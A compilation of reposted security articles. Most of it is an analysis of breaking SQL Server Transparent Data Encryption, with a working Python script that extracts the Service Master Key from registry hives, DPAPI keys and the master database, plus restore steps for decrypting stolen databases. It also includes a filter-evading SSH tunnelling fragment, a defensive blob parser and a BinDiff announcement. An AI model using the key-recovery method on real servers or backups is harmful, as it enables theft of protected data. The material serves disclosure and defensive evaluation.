    Now you have a working tunnel! You should be ssh'd into your box, and you have a listening SOCKS5 proxy on port 8080 for tunnelling web browsing, email, etc through.

    Let me know via email or whatever how this works out for you, I am very interested to know where it works and where it doesn't. Usually I rely on DNS/ICMP tunnelling or UDP over port 53 with OpenVPN, but sometimes you just have to blast through the fucker by speaking a language it doesn't even seem to comprehend.

    Source: http://0x27.me/2015/07/27/SSH-Over-SCTP.html
  23. The Anatomy and (In)Security of Microsoft SQL Server Transparent Data Encryption (TDE), or How to Break TDE

Contents
- Intro
- TDE Encryption
- Breaking TDE
- Encryption of Data at Rest in General
- Should I Install TDE?
- Making the Most of a Bad Situation (using TDE)
- Hardware Support
- If not TDE, then what?

Intro

This investigation started as a discussion with one of my clients over whether they should install TDE. There was political pressure for encryption of data at rest, and TDE was the primary candidate, but there is an obvious flaw.

There is a fundamental problem with any software that encrypts its own data: it also needs to decrypt the data if it wants to use it itself. For example, if SQL Server wants to write data to an encrypted database and then later return it to a user, it needs the decryption key available to itself to be able to do that. If the system also has to boot without manual intervention and the sensitive functionality can’t be embedded in separate protected hardware, then that key must be stored on the system somewhere so that the server has access to it when it starts up. However if the key is stored on the system it is accessible to anybody that has gained elevated privileges and if the entire system is backed up, the key is also stored on the backups, making all data easily readable.

“Obviously” the solution is to encrypt the key before storing it on the system, and that is what Microsoft does with TDE. Unfortunately that doesn’t really solve anything because in order to decrypt the encrypted key, you need to store that key instead. All this achieves is deferring the storage of the key with a little smoke and mirrors. Clearly the solution is to encrypt the encrypting key as well… And that is what Microsoft does with TDE. And so it continues. It’s turtles all the way down.

Eventually though you have to stop adding layers and store the bottommost key somewhere unencrypted, defeating all of the layers of encryption immediately – and the whole world comes tumbling down, turtles and all.

This basic and unavoidable logical necessity escapes many people. Perhaps it seems so terrible that they refuse to believe that such a seemingly pointless and maybe even dishonest thing would be built and sold as a security mechanism by a major company. Despite basic logic, some people just won’t believe anything until they see it with their own eyes, and so here we are.

TDE Encryption

Before we jump into breaking TDE, let’s take a look at how all of the data is encrypted. The diagram below provides an overview of the various decryption steps that are required. If this isn’t the posterchild of security by obscurity, I don’t know what is.

This is actually slightly simplified, since there are multiple paths to the same data in some cases, and there are some subtleties in some of the processes not indicated. The path shown is the one we are most interested in because it is one of the easiest to replicate.

Starting at the bottom, the most fundamental secret is the LSA secret key, which the rest of the layers stand on top of. This is stored on disk in the registry with a minor obfuscation (“substitution cipher”), but it is well known and is unkeyed so it provides no security whatsoever. Given that LSA key and a few other bits of key material stored in other files, the whole mess falls apart.

The blue bubbles indicate the underlying files that contain the various critical pieces of information:
- The registry backups or hive files SYSTEM, SECURITY and SOFTWARE from %WINDIR%/System32/Config
- The DPAPI master keys from %WINDIR%/System32/Microsoft/Protect/S-1-5-18
- The master database and the target user database(s). The databases can be recovered either from a SQL backup file or from raw .mdf files. In the case of .mdf files, it is also useful to have the corresponding .ldf database log files, though it is not essential.

Armed with these pieces of information, all of the encryption keys can be directly recovered with no brute force required.

Breaking TDE

From the perspective of SQL server, the one key that rules them all is the Service Master Key (SMK). It is unique to each server/cluster, and it secures all of the layers above it. It is stored in the master database, which itself is never encrypted in TDE. However it is stored as an encrypted value in a field in the master database, so it still needs to be decrypted.

The general approach to breaking TDE is to copy the databases from the target server (or from backups) and put them on a new “recovery” SQL server that we control. By copying the Service Master Key as well, all of the encrypted databases will be automatically decrypted by SQL server on the recovery server. The data on the recovery server can then be viewed, exported, etc. So it’s not necessary to really understand exactly what SQL Server does with the various database encryption keys beyond the Service Master Key, because we will just use it against itself to decrypt everything for us.

The simple python script below takes the files collected and extracts the Service Master Key. Most of the work involved is in recovering the DPAPI keys, which is handled for us thanks to the excellent work from the creddump and dpapick projects.
    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    # Python 2 script: dpapick 0.3 and the 'hex' codec used below are Python 2 only.

    from DPAPI.Core import blob  # https://pypi.python.org/pypi/dpapick/0.3
    from DPAPI.Core import masterkey
    from DPAPI.Core import registry
    from optparse import OptionParser
    from Registry import Registry  # https://github.com/williballenthin/python-registry
    from bitstring import ConstBitStream
    import re
    import os
    import sys


    def search_with_blob(entropy, dpapi_system, mkp, tdeblob):
        """Try decrypting with each master key"""
        wblob = blob.DPAPIBlob(tdeblob)
        # Only the master keys matching the GUID named in the blob header are candidates
        mks = mkp.getMasterKeys(wblob.mkguid)
        for mk in mks:
            if mk.decrypted:
                # The per-instance 'Entropy' registry value is the optional entropy
                # SQL Server passed to CryptProtectData
                wblob.decrypt(mk.get_key(), entropy)
                if wblob.decrypted:
                    print("Decrypted service master key: %s" % wblob.cleartext.encode('hex'))
                else:
                    print("Decryption failed")


    def search_with_entropy(entropy, dpapi_system, mkp, masterdb):
        """Search for DPAPI blobs in master database"""
        # Scan the raw file for dwVersion == 1 followed by the DPAPI provider GUID
        masterdb = ConstBitStream(filename=masterdb)
        for found in masterdb.findall('0x01000000D08C9DDF0115D1118C7A00C04FC297EB', bytealigned=True):
            blobsegment = masterdb[found:found + 512 * 8]  # Extraneous bytes ignored
            search_with_blob(entropy, dpapi_system, mkp, blobsegment.tobytes())


    parser = OptionParser()
    parser.add_option("--masterkey", metavar='DIRECTORY', dest='masterkeydir')
    parser.add_option("--system", metavar='HIVE', dest='system')
    parser.add_option("--security", metavar='HIVE', dest='security')
    parser.add_option("--software", metavar='HIVE', dest='software')
    parser.add_option("--masterdb", metavar='FILE', dest='masterdb')
    (options, args) = parser.parse_args()

    # Recover the LSA secrets from the SECURITY hive (keyed by the SYSTEM hive bootkey);
    # DPAPI_SYSTEM is the credential that protects the machine master keys
    reg = registry.Regedit()
    secrets = reg.get_lsa_secrets(options.security, options.system)
    dpapi_system = secrets.get('DPAPI_SYSTEM')['CurrVal']

    # Load the S-1-5-18 master key files and decrypt them with the system credential
    mkp = masterkey.MasterKeyPool()
    mkp.loadDirectory(options.masterkeydir)
    mkp.addSystemCredential(dpapi_system)
    mkp.try_credential_hash(None, None)

    # Each SQL instance stores its own DPAPI entropy under its Security key
    with open(options.software, 'rb') as f:
        reg = Registry.Registry(f)
        regInstances = reg.open('Microsoft\\Microsoft SQL Server\\Instance Names\\SQL')
        for v in regInstances.values():
            print("Checking SQL instance %s" % v.value())
            regInst = reg.open('Microsoft\\Microsoft SQL Server\\%s\\Security' % v.value())
            entropy = regInst['Entropy'].value()
            search_with_entropy(entropy, dpapi_system, mkp, options.masterdb)

Conveniently, the script is cross platform so it doesn’t need to be run on the Windows machine. That means no software installation is required on the target server, just some file exfiltration (or backups can be used).

Once the DPAPI keys have been recovered, this script searches the master database for encrypted Service Master Keys. They are encrypted in a special DPAPI blob structure. The DPAPI structure always includes a provider GUID: df9d8cd0-1501-11d1-8c7a-0c04fc297eb which makes them easy to find. Since the master database is unencrypted we could just use SQL server to extract them, but that would require a bit more coordination and fiddling. Because the GUID is so definitive this quick and dirty approach of searching directly in the master database is used for the proof of concept instead. It also means it works equally well with either SQL backup files or native .mdf files, despite the file formats being different.
Execution just points to the necessary files, and goes something like this:

    $ ./tde.py --masterkey=S-1-5-18 --system=SYSTEM --security=SECURITY --software=SOFTWARE --masterdb=master.mdf

The result is simply the unencrypted Service Master Key in all its naked glory:

    Decrypted service master key: 999338193ab37c38c3aa99df062e2f5ca96b7dbc87542af9d61e0dc8a473c1f9

SQL Server has a way of backing up and restoring Service Master Keys, using the command

    BACKUP SERVICE MASTER KEY TO FILE = 'some-file-to-write-to' ENCRYPTION BY PASSWORD = 'some-password'

And likewise, they can be restored onto a new server with the command

    RESTORE SERVICE MASTER KEY FROM FILE = 'some-file-to-read-from' DECRYPTION BY PASSWORD = 'some-password' [FORCE]

With the Service Master Key restored, the other keys in the master database can also be decrypted, and the database accessed.

Unfortunately we don’t have a backup file of the Service Master Key from the target machine (actually in many attack scenarios we could just execute the backup command as well, but that doesn’t work for backup restores and some other scenarios). In our case, where we have a recovered raw key but no backup file, an obvious way to install the SMK would be to encrypt the SMK with DPAPI system credentials on the recovery computer and store in the master database. The dpapick library doesn’t currently support encryption and I was in a hurry so I skipped this method for now, though it probably wouldn’t take much effort.

Instead, I went for a quick and dirty method that creates a SMK backup file but it is a bit manual. So this can undoubtedly be streamlined, but for the proof of concept I used a simple cuckoo’s egg method that is shown in the video as part of an end-to-end recovery demo. This method generates a SMK backup file with the recovered key, which we can restore onto our recovery SQL server.
Armed with the new Service Master Key backup file, the steps to restore a TDE backup (from .bak files) to the recovery server are:

1. Start SQL server in single user mode (-m startup option)
2. Restore master database

       RESTORE DATABASE MASTER FROM DISK = 'c:\...\master.bak' WITH REPLACE;

3. Restart SQL service (still in single user mode)
4. Add administrator user/reset admin password.
5. Restart service in normal multi-user mode
6. Restore SMK with the FORCE option

       RESTORE SERVICE MASTER KEY FROM FILE = 'some-file-to-read-from' DECRYPTION BY PASSWORD = 'some-password' FORCE

7. Restore the target database(s)
8. Refresh database list

In the case of restoring from .MDF/.LDF files, the steps are:

1. Stop SQL service
2. Copy .mdf/.ldf files, replacing existing master database
3. Start SQL server in single user mode (-m startup option)
4. Add administrator user/reset admin password.
5. Restart service in normal multi-user mode
6. Restore SMK with the FORCE option

       RESTORE SERVICE MASTER KEY FROM FILE = 'some-file-to-read-from' DECRYPTION BY PASSWORD = 'some-password' FORCE

7. Take target database(s) offline
8. Bring target database(s) online again
9. Refresh database list

At this point, we have fully recovered and have access to the encrypted databases.

Encryption of Data at Rest in General

There seems to be a tendency to just assume encryption is a good thing without considering specific attack scenarios, but doing so is essential and also very revealing. For example, here are some common attack scenarios and details on how well TDE helps with the situation. For comparison purposes, application based encryption protection is described for each attack scenario as well.

Attack scenario: SQL injection or similar SQL manipulation attack
  TDE: SQL server automatically decrypts data for attacker, and TDE provides no protection.
  Application encryption: Attacker can only retrieve encrypted data.

Attack scenario: Attack that provides local admin access on SQL server. SQL is configured to allow NTLM login for administrator.
  TDE: TDE does nothing. Admin can log in to SQL and view/export tables, make backups, export service master keys, etc. Attacker can also use TDE recovery method here.
  Application encryption: Attacker can only retrieve encrypted data.

Attack scenario: Attack that provides local admin access on SQL server. SQL is not configured to allow NTLM login for administrator.
  TDE: Attacker can easily acquire access for themselves as SQL admin and view/export data. Attacker can also use TDE recovery method here.
  Application encryption: Attacker can only retrieve encrypted data.

Attack scenario: Attack that provides application server admin access only (no access to SQL server).
  TDE: Attacker can exploit application to request sensitive data. TDE doesn’t protect data.
  Application encryption: Attacker can recover application encryption keys and exploit application to request sensitive data.

Attack scenario: Attack that provides application server access as low privilege user.
  TDE: Potentially protected, but true regardless of having TDE.
  Application encryption: Potentially protected, but true regardless of having application encryption.

Attack scenario: Attack that provides escalated access as local SQL service user on SQL server.
  TDE: Attacker can issue arbitrary queries and data is decrypted for them automatically.
  Application encryption: Attacker can only retrieve encrypted data.

Attack scenario: Servers stolen, hard drives stolen/recovered, or complete backups acquired (no additional encryption or separation).
  TDE: TDE data can be decrypted as described here.
  Application encryption: Attacker can recover application keys and decrypt data. However it may require reverse engineering since the encryption is custom, so it is more difficult than in the case of TDE.

Attack scenario: System and DB backups are stored physically separately.
  TDE: Attacker can retrieve encrypted data or keys but less likely to get both. Inferior to conventional backup encryption though, which entirely prevents this.
  Application encryption: Attacker can only retrieve encrypted data.

Attack scenario: Backups acquired, but additional encryption is implemented as part of backup process.
  TDE: Protected, but TDE doesn’t add any benefit.
  Application encryption: Protected, but application encryption doesn’t add any benefit.

Attack scenario: Attacker gains access to database files (eg on a vulnerable SAN), but not other system files (eg on a local disk).
  TDE: TDE provides a benefit in this case, but it is not always applicable. It is also preferable to arrange so any SAN is only physically accessible from the SQL server, in which case TDE doesn’t add anything.
  Application encryption: Attacker can only retrieve encrypted data.

We can see that in practice for most real world attack scenarios TDE doesn’t help or provides worse security compared to other approaches that also have less system impact.

Should I Install TDE?

The weakness in TDE is not a bug or a fault of Microsoft; it is a much more fundamental problem, and it is not in any way unique to SQL Server. Any other database has to abide by the same logic. This is the result of people demanding features without understanding what they are asking for. Microsoft know it isn’t secure, and you can see this in some of the language they use in the documentation. It’s about satisfying political pressure not about solving real security issues. It is the same lack of understanding that perpetuates and pervades management best practices. People want encryption of data at rest, but also want automatic booting and conventional database systems, and don’t want to have to change their applications. The result is always going to be insecure. But they have their boxes to tick on their security checklists.

As well as little to no practical security enhancement TDE gives you:

- Reduced performance. Depending on your architecture and use patterns, this typically varies from 2% to 12%, see http://www.databasejournal.com/features/mssql/article.php/3815501/Performance-Testing-SQL-2008146s-Transparent-Data-Encryption.htm However systems that are write heavy or that have wide data scans over data that are much larger than RAM may see 15% impact or more. Systems under heavy load may also degrade non-linearly.
- Uncompressible backups. Since encryption occurs before backup compression, and encrypted data cannot be compressed, backups will be significantly larger. This has direct cost implications. Conventional backup systems compress before encrypting and avoid this problem.
- A false sense of security. There are many situations in which TDE becomes effectively null and void. Unless great care is taken to avoid these the false sense of security is likely to lead unwary users to expose sensitive information that would have otherwise been protected with other more straightforward security methodologies.

TDE offers little to no practical benefit. Given the significant downsides, for most situations it is not even practically useful as one component in a multi-pronged security approach.

On the flip side of the coin, there are common arguments for using TDE:

- “It’s better than nothing”. No, it really isn’t… At least nothing wouldn’t make your system run slower and cost more to run. Other conventional security practices address the same threats more effectively and without the impact.
- “It’s one more layer”. It’s a layer that does nothing beneficial, but has unequivocal downsides. There is no rational basis for adding components to a system that reduce performance and increase costs for no benefit.
- “Encryption of data at rest is current best practice and required for security compliance in many industries like PCI”. This is politics more than reasoning. Also, TDE is not the only method of encrypting data at rest. Some other methods suffer fewer problems, as we saw earlier.
- “You’re assuming an attacker has administrative access, which is an unreasonable assumption. We want to protect against lesser privileged attacks.” Lesser privileged users shouldn’t be able to get your database files anyway. It’s always true that if an attacker has admin access, all bets are off. There are a lot of other terrible things they could do too. An admin user can always directly access SQL server, bypassing TDE encryption entirely. We’re really just showing that file access is sufficient, not that there aren’t also other weaknesses in this case. For any sensibly configured SQL server, no Windows users other than SQL user and local Administrator(s) should even exist. File permissions should also be such that no other users can read SQL data files, even if accidentally granted access to the server. SQL data files are also usually not readable to normal users because they are locked while in use. The only users that could realistically read the database files off a live server will be privileged users and they will be able to read all the other files too. But also importantly, we’re also considering the situation where backups, hard drives or servers are stolen, or some other access to the storage is obtained for unspecified reasons.

So, should I install TDE? Probably “No”. Only if you’re forced to. If arguing will lose your job; probably “Yes”.

Making the most of a bad situation (using TDE anyway)

If political pressure is such that you have to install TDE despite its shortcomings:

- Ensure database backups are physically isolated from system backups or preferably
- Encrypt your backups separately, using alternative backup software encryption facilities (they don’t suffer the same problems as TDE). This somewhat defeats one of the purposes of TDE of course but at least avoids exposing yourself.
- Use hardware support to alleviate performance penalties or for key storage (see below), but this significantly increases costs even more and doesn’t help with security.
- Be aware of the situations it doesn’t help, and implement other strategies to deal with them. They will effectively make TDE redundant, but at least you ticked your boxes.

Hardware Support

Inexplicably, SQL Server doesn’t seem to support Intel AES-NI acceleration for AES which would greatly reduce the performance impact.
There are vendors such as Thales, Townsend and SafeNet that provide hardware security modules (HSMs) that are compatible with SQL Server. The claimed benefits are hardware accelerated encryption and key protection.

Hardware acceleration is great if you’re forced to use TDE for some reason. It should reduce the performance impact significantly.

The security is questionable. I tried to get some information but had no luck getting responses. But there is a fundamental issue with hardware modules that integrate at the application level (as opposed to deep OS integration). The concept is that the HSM stores the encryption keys onboard and takes care of all encryption out of main memory and off-CPU. Without an audit, which seems not to have been done, there is no way to know how difficult it is for an attacker to recover keys from the devices. But more importantly, there is nothing stopping an attacker from asking the device to do the decryption for them. An attacker can send a perfectly valid request to the HSM asking it to decrypt a database block and end up decrypting the entire database. You might say that the HSM should only accept requests from SQL server. It’s not clear they attempt to do that at all, but in any case, in order to do that, SQL server would need to authenticate itself to the HSM. At some point that involves a key, which it also needs to store somewhere, and we have the turtle problem all over.

One benefit of an HSM is that it prevents SQL server storing keys on your hard drives at all. This means the keys aren’t stored in your backups. In practice though, this is of no real benefit since conventional backup encryption solves the same problem without any hardware or costs (and keeps backup size down, as mentioned earlier).

So HSM is a sensible choice for acceleration in the case you are forced to use TDE, but don’t kid yourself into thinking it helps with security.

If not TDE, then what?

Application (column level) based encryption of data at rest is an alternative to TDE. It avoids some of the pitfalls, but requires support from application developers and may be expensive to retrofit to existing systems.

Great care should be taken with access to servers and with file permissions. An unprivileged user should be entirely prevented from accessing database files. A privileged user will be able to decrypt and read encrypted data in all cases, so don’t dwell over it too much. The only thing you can practically do is keep the files away from unprivileged users, and try to prevent users from escalating by following other good security practices. Adding TDE on top of that won’t help a bean since an unprivileged user can’t get the data and a privileged user can read it despite TDE.

Backups should be encrypted with an independent encryption system integrated into the backup system.

Your permissions and other access controls should be audited automatically and frequently so that if an accidental change is made it can be fixed before it is exploited.

Sursa: http://simonmcauliffe.com/technology/tde/
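Added example (not code from the post above, nor from the creddump or dpapick projects): a parser for the DPAPI (CryptProtectData) blob header that the post's script locates by its provider GUID. It lets a defender inventory which DPAPI master key GUID a master database or backup image depends on, so the claim that a backup plus the %WINDIR%/System32/Microsoft/Protect/S-1-5-18 directory exposes the Service Master Key can be verified without decrypting anything. The master key GUID, description and ciphertext in the sample image are constructed; the field layout is the standard CryptProtectData blob structure.

```python
import struct
import uuid

# Added example (not code from the post or from creddump/dpapick): parses the
# CryptProtectData blob header so a master database or backup file's DPAPI
# master-key dependency can be inventoried without decrypting anything.

# Signature the post's script searches for: dwVersion == 1 followed by the
# provider GUID df9d8cd0-1501-11d1-8c7a-00c04fc297eb in on-disk byte order.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
BLOB_SIGNATURE = struct.pack("<I", 1) + DPAPI_PROVIDER_GUID.bytes_le
ALG_NAMES = {0x6603: "3DES", 0x6610: "AES-256", 0x8004: "SHA1", 0x800E: "SHA-512"}  # ALG_IDs


def parse_dpapi_blob(data, offset=0):
    """Parse the DPAPI blob header at data[offset:]. Returns a dict of its
    metadata, or None when the bytes are truncated or not a DPAPI blob."""
    pos = offset

    def take(n):
        nonlocal pos
        if pos + n > len(data):
            raise ValueError("truncated blob")
        pos += n
        return data[pos - n:pos]

    def dword():
        return struct.unpack("<I", take(4))[0]

    def sized():  # DWORD byte count followed by that many bytes
        return take(dword())

    try:
        if dword() != 1 or uuid.UUID(bytes_le=take(16)) != DPAPI_PROVIDER_GUID:
            return None
        mk_version = dword()
        mk_guid = uuid.UUID(bytes_le=take(16))  # file name under Protect/<SID>/
        flags = dword()
        description = sized().decode("utf-16-le", "replace").rstrip("\x00")
        alg_crypt, _crypt_bits = dword(), dword()
        salt, _hmac_key = sized(), sized()
        alg_hash, _hash_bits, _hmac2_key = dword(), dword(), sized()
        ciphertext, signature = sized(), sized()
    except ValueError:
        return None
    return {"masterkey_guid": str(mk_guid), "masterkey_version": mk_version,
            "flags": flags, "description": description,
            "cipher": ALG_NAMES.get(alg_crypt, hex(alg_crypt)),
            "hash": ALG_NAMES.get(alg_hash, hex(alg_hash)), "salt_len": len(salt),
            "ciphertext_len": len(ciphertext), "signature_len": len(signature),
            "total_len": pos - offset}


def scan_for_blobs(data):
    """Find every DPAPI blob in a raw file image (.mdf or .bak) with the same
    signature search the post's script uses, and return the parsed headers."""
    found, start = [], 0
    while True:
        start = data.find(BLOB_SIGNATURE, start)
        if start < 0:
            return found
        parsed = parse_dpapi_blob(data, start)
        if parsed is not None:
            parsed["offset"] = start
            found.append(parsed)
        start += len(BLOB_SIGNATURE)


def build_test_blob(mk_guid, description, ciphertext):
    """Construct a syntactically valid blob with dummy contents, for testing."""
    def sized(b):
        return struct.pack("<I", len(b)) + b
    return (BLOB_SIGNATURE + struct.pack("<I", 1) + mk_guid.bytes_le
            + struct.pack("<I", 0) + sized(description.encode("utf-16-le") + b"\x00\x00")
            + struct.pack("<II", 0x6610, 256) + sized(b"\x11" * 32) + sized(b"")
            + struct.pack("<II", 0x800E, 512) + sized(b"") + sized(ciphertext)
            + sized(b"\x22" * 64))


# Constructed stand-in for a master.mdf image: zero padding around one blob.
TEST_MK_GUID = uuid.UUID("12345678-1234-5678-1234-567812345678")
SAMPLE_IMAGE = (b"\x00" * 100 + build_test_blob(TEST_MK_GUID, "constructed", b"\xaa" * 48)
                + b"\x00" * 100)
```

Running scan_for_blobs over a real master.mdf or .bak reports each blob's master key GUID; if a file of that name exists in the Protect/S-1-5-18 directory on the same backup set, the key chain the post describes is fully present in the backup.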
  24. BinDiff now available for free

March 18, 2016
Posted by Christian Blichmann, Software Engineer

BinDiff is a comparison tool for binary files that helps to quickly find differences and similarities in disassembled code. It is used by security researchers and engineers across the globe to identify and isolate fixes for vulnerabilities in vendor-supplied patches and to analyze multiple versions of the same binary. Another common use case is to transfer analysis results from one binary to another, helping to prevent duplicate analyses of, for example, malware binaries. This also helps to retain knowledge across teams of binary analysts where the individual workflows might vary from analyst to analyst.

More specifically, BinDiff can be used to:
- Compare binary files for x86, MIPS, ARM/AArch64, PowerPC, and other architectures.
- Identify identical and similar functions in different binaries.
- Port function names, comments and local variable names from one disassembly to another.
- Detect and highlight changes between two variants of the same function.

Here is a screenshot demonstrating what using BinDiff to display per-function differences looks like:

At Google, the BinDiff core engine powers a large-scale malware processing pipeline helping to protect both internal and external users. BinDiff provides the underlying comparison results needed to cluster the world's malware into related families with billions of comparisons performed so far.

Ever since zynamics joined Google in 2011, we have been committed to keeping our most valuable tools available to the security research community. We first lowered the price, and today we are taking the next logical step by making it available free of charge.

You can download BinDiff from the zynamics web site. It’s the current version, BinDiff 4.2 for both Linux and Windows. To use it, you also need the commercial Hex-Rays IDA Pro disassembler, 6.8 or later.

Happy BinDiff-ing!
Sursa: https://security.googleblog.com/2016/03/bindiff-now-available-for-free.html